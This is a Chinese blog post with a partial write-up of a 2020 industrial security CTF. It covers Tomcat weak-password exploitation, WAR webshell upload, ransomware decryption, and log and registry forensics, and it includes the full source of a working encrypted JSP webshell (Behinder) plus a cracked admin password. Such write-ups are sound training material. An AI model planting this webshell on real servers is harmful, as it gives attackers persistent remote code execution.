2020工业安全技能大赛——应急&电力专场部分WriteUp

最新推荐文章于 2023-07-06 13:33:07 发布
最新推荐文章于 2023-07-06 13:33:07 发布
阅读量2.6k 收藏 7
点赞数 1
文章标签: 信息安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Pdsdt1/article/details/107394982
版权

原文:

Pdsdt’s Blog

平台登陆

需要我们连接VPN才能进入内网,登陆用户名和密码需要在平台进行申请,用的接入设备是深信服的软件,总体连接还是比较稳定的

image.png-71.6kB

传输模式改为TCP比较稳定,主办方提供了具体的网段10.10.1.X,我们可以利用工具进行IP和服务探测,这里我使用的Advance_IP_Scanner

image.png-82.9kB

电力专场

互联网大区题目一

扫描内网发现10.10.1.55的靶机开启WEB服务

image.png-12.3kB

访问一下发现是Jsp搭建的博客,懒得手动测试了,直接上了扫描器

image.png-89.1kB

发现了存在弱口令登陆

image.png-56.2kB

在manager/html目录下,存在文件上传的点,我们可以构造我们的WEBSHELL压缩成WAR包上传,之后tomcat会服务会自动解包并将我们的WEBSHELL解析

image.png-78.7kB

访问发现有其他人上马的痕迹,省时间直接骑别人的了

image.png-30.3kB

发现在ROOT目录下存在f1ag.txt,直接下载查看即可获取flag

image.png-33.8kB

互联网大区题目二

与上一道题目是一个环境,不过提示我们在WEB环境仍然存在一个flag,为了方便期间上传我们的冰蝎马进行链接

<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if(request.getParameter("pass")!=null){String k=(""+UUID.randomUUID()).replace("-","").substring(16);session.putValue("u",k);out.print(k);return;}Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec((session.getValue("u")+"").getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);%>

后来找了WEB源码也没找到,想到了去数据库查找,先把源码都给Down了下来,找一下数据库的配置文件

image.png-40.2kB

使用冰蝎进行数据库连接,还是没有找到flag,之后找了后台登陆的用户名和密码

username= admin
md5(password)= ee955f62cb93483a635817b9f263439e # cmd5解出来的密码和数据库连接密码一样shenmiliu

登陆后台还是没有发现flag,想问问其他师傅们这个题目的flag到底是什么东西

应急专场

这个题目需要我们登陆远程桌面进行获取,远程桌面是WIN7的系统,想到了用户名应该为Administrator,利用主办方给我们提供的主机密码成功登陆

image.png-400.3kB

不过顺利都是暂时的,后面我还遇到了,密码被修改、协议不正确、服务被关闭、主机IP变化等问题,等到六点之后内网的服务才趋于稳定…

解勒索病毒

桌面给了一个flag.txt.vlojw的文件,我们需要解密一下这个文件,在主机里进行信息收集,可以在admin的桌面下找到VLOJW-DECRYPT.txt,打开后发现勒索病毒为GANDCRAB V5.1
通过查阅资料可以知道该病毒已经有了解密软件

https://www.52pojie.cn/forum.php?mod=viewthread&tid=874030&highlight=GANDCRAB

直接使用软件进行扫描修复即可

image.png-25.2kB

要注意的是,软件需要很长的时间,等着就完事了,解密成功后,就会在桌面下出现flag.txt

image.png-143kB

病毒分析3

分析从远程获取到的文件,分析17-010补丁文件

image.png-20kB

从远程dump部分文件下来。
题目寻找为MSF生成的马的ip,这里直接去运行文件,抓包分析即可。
运行17-010补丁并且抓包

image.png-65.9kB

rdp攻击日志分析

参考文章:

https://blog.csdn.net/m0_37552052/article/details/82894963

事件管理器中找到TerminalServices-RemoteConnectionManager
选择日志进程号1149找ip

image.png-127.4kB

浏览器取证

仍然是注册表里找信息

image.png-157.7kB

这几个题目主要都是考察注册表的熟悉程度

内存取证分析

全场最离谱的题目,没有之一,给了一个加密的RAR让我们破解,队友有尝试爆破的,后来七点多的时候,一个队友试了一下主办方提供的远程桌面登陆的密码,结果打开了…

image.png-3.5kB

image.png-15.2kB

赛后

希望下两场的环境能够稳定一些,能够多一点赛事体验感

Pdsdt1
关注
  • 1
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
2020全国工业互联网安全技术技能大赛-护网杯-chinaiisc2020.zip
10-24
2020全国工业互联网安全技术技能大赛,原来的护网杯,比赛的原题以及附件,供大家进行学习和交流。祝大家技术进步!
2021CTF工业信息安全技能大赛(杭州站)
08-02
【标题】"2021CTF工业信息安全技能大赛(杭州站)" 描述了一次重要的信息安全竞赛活动,该活动在2021年于杭州举行,聚焦于工业信息安全领域。CTF,全称Capture The Flag,是信息安全领域的常见比赛形式,通常包含解谜...
【CTF WriteUp】2020全国工业互联网安全技术技能大赛密码题(Crypto)wp
qq_45603443的博客
10-24 4525
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 护网杯2020wp一、题目 2E二、根据题目给脚本推出EXP如下:1.Task.py2. print(key)3. print(1)4. mt.py得到flag![在这里插入图片描述](https://img-blog.csdnimg.cn/20201024231116648.jpg#pic_center) 一、题目 2E 二、根据题目给脚本推出EXP如下: 1.Task.py 代码如下(示例): import random from
2021年江西工业互联网安全技术技能大赛线上初赛Writeup
末初的CSDN博客
10-05 3059
文章目录协议分析S7协议分析工控流量分析异常流量分析应急处置图片的秘密现场数据采集应急恢复文件分析组态编程探索组态密码恶意程序恶意app分析恶意程序分析固件分析丢失的密码工业固件分析 协议分析 S7协议分析 0300002402f080320100000003000e00050501120a100200010000830000000004000801。 请解读以上协议内容,并准确的拿到此报文返回值,flag即为返回值。提交格式:flag{xxx}。 写入报文的数据分析 03 00
2021年江西工业互联网安全技术技能大赛线下决赛部分Writeup
末初的CSDN博客
10-19 1665
文章目录智能制造风力发电CTF火力发电厂智慧城市 智能制造 签到题,直接查找http流量包中的关键字 http contains "flag" flag{jx2021} 风力发电CTF 题目描述 风力发电机平时正常转速2500转每分钟,但有一天风力发电机转速异常,请从流量包中找出异常的转速流量之和。 TCP总共14个流,其中有几个流有一些十六进制字符数据,转换字符没发现什么线索,也没发现什么规律,然后用Hex 转储发现第一个流的数据存在规律 WireShark不方便做查找,复制到Sublime发
2023年中国工业互联网安全大赛决赛-靶场环节Writeup
末初的CSDN博客
07-06 3010
这种长度很明显的嫌疑最大,点击一看是PNG头,但是该字段从第12个字节位置开始才是png数据,其中第9、第10个字节是计数位,不过这里并不是打乱发的,所以不用考虑排序问题。,首先猜测是盲水印,但是经过测试不是盲水印,后面发现是两张图异或。两部分flag,从udp流中分析可知有两部分,第二部分数据是png数据,第一部分是txt。提取出来的png要比原图大一点,盲水印尝试了不对,异或时发现疑似flag。然后根据前面给的加密逻辑,写解密脚本,加密算法是。是视频文件,使用分离工具,这里用。
计算机信息安全op协议,2019工业信息安全技能大赛个人线上赛第一场(前5道)writeup • 旭达网络技术博客...
weixin_42367464的博客
07-20 3112
运行脚本,将图片码进行base64解码,解码后得到写有Flag的图片,Flag为flag{ICS-mm104},脚本和原始图片如下:# coding=utf-8import os, base64img_str = 'iVBORw0KGgoAAAANSUhEUgAAAdAAAABiCAYAAADgKILKAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZ...
山东省大学生网络安全技能大赛决赛Writeup.pdf
09-30
本文档总结了山东省大学生网络安全技能大赛决赛的Writeup,涵盖了Crypto0x00 RSA1、RSA2和仿射加密三个部分的知识点。 Crypto0x00 RSA1 在Crypto0x00 RSA1部分中,我们需要使用Python脚本或者OpenSSL来解出RSA加密...
2024年第十七届全国大学生信息安全竞赛创新实践能力赛初赛部分Writeup
最新发布
05-27
2024年第十七届全国大学生信息安全竞赛创新实践能力赛初赛部分Writeup解析部分题目
网络安全管理职业技能竞赛Web writeup1
08-03
网络安全管理职业技能竞赛Web writeup1 在本次网络安全管理职业技能竞赛Web writeup中,我们将探讨Web安全领域中的一个CTF挑战,涵盖了SQL注入、错误信息处理、Web应用安全等多个方面的知识点。 SQL注入 在本挑战...
2019工业信息安全技能大赛试题
07-30
2019工业信息安全技能大赛的CTF试题,里面存在流量题、加密、隐写、逆向、固件、工控协议、等等
2020全国工业互联网安全技术技能大赛题目
10-28
含有misc,re,crypto,pwn及题目说明
2021CTF工业信息安全技能大赛(常州站)
08-03
2021CTF工业信息安全技能大赛(常州站)
2020工业控制安全大赛试题.zip
09-12
“中能融合杯”第六届全国工控系统信息安全攻防竞赛于9月12日上午9:00准时开赛,工控系统信息安全攻防竞赛已成功举办5届,前五届赛事分别聚焦能源电力(火电厂、新能源)、城市公用事业领域燃气、水务、应急响应等领域。第六届大赛告别前五届的线下比拼,迈入“线上+线下”并重的赛事2.0时代,初赛采用CTF夺旗形式。除此之外,赛题设计也更具特色,题目总共分为15道,4个关卡:第一关卡为签到题;第二关卡为传统的互联网竞赛题目;第三、四关卡为工业相关技能竞赛题。
2018全国大学生信息安全竞赛web题出题docker+writeup.zip
11-09
信息安全竞赛相关程序代码、设计文档、使用说明,供参考 信息安全竞赛相关程序代码、设计文档、使用说明,供参考 信息安全竞赛相关程序代码、设计文档、使用说明,供参考 信息安全竞赛相关程序代码、设计文档、使用...
【CTF WriteUp】2020全国工业互联网安全技术技能大赛(原护网杯)Crypto题解
cccchhhh6819的博客
10-25 6856
Crypto signsystem 题目中的加密算法很奇怪,所以测试一下加密算法的结果,得到如下结论: 在不模n的情况下,该函数加密结果满足以下数列: f(1) = m, f(2) = m^2-2, f(n+2) = m*f(n+1) - f(n) 列出几项观察: m, m^2-2, m^3-3m, m^4-4m^2+2, m^5-5m^3+5m, ... 暂时没有得到有用结论。再看一看e和d的关系,随便找了100个输入,确认e和d在该算法可逆,原理不明。 继续看代码。代码允许输入一个明文m计算enc(
2020全国工业互联网安全技术技能大赛Web题WP
李熠专用博客_白帽子一枚,人称低危终结者
10-25 6280
0x00 SimpleCalculator 打开后,发现flag.php可执行数学函数,在网上找到一个原题:https://www.cnblogs.com/20175211lyz/p/11588219.html 可执行shell拿到flag。 payload如下: http://eci-1cei547jhyas2r4f5r2.cloudeci1.ichunqiu.com/flag.php?search=\$pi=(is_nan\^(6).(4)).(tan\^(1).(5));\$pi=\$\$pi;\$p
2020电力行业网络安全攻防邀请赛MISC3
GreatYuTong的博客
10-13 542
MISC3-wp: 第一步:发现题目的压缩包是加密的,放到010editor,发现图下图的滴滴答; 第二步:将上图中的“/”替换为空格得到Moses码,并解密到压缩包的密码:YRGIXRV73OPRS 。如下图: 第三步:解压压缩包,得到二维码,通过扫描二维码得到base64字符串;并将base64转为字符串既可得到flag{97gu99px-9g1g0-up6c70f13qze6w9oe} 。具体如下图: ...
工控CTF之协议分析7——OMRON
一个普普通通的博客
12-20 2116
工控CTF之协议分析7——OMRON
网鼎杯writeup-护网先锋1
08-04
"这篇WriteUp主要涵盖了网络安全竞赛“网鼎杯”的多个挑战的解决方案,包括密码解密、栈溢出漏洞利用、程序反汇编分析以及URL路径绕过等技术。" 0x00Not_only_base 在这个挑战中,参赛者需要通过解密获取FLAG。首先...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值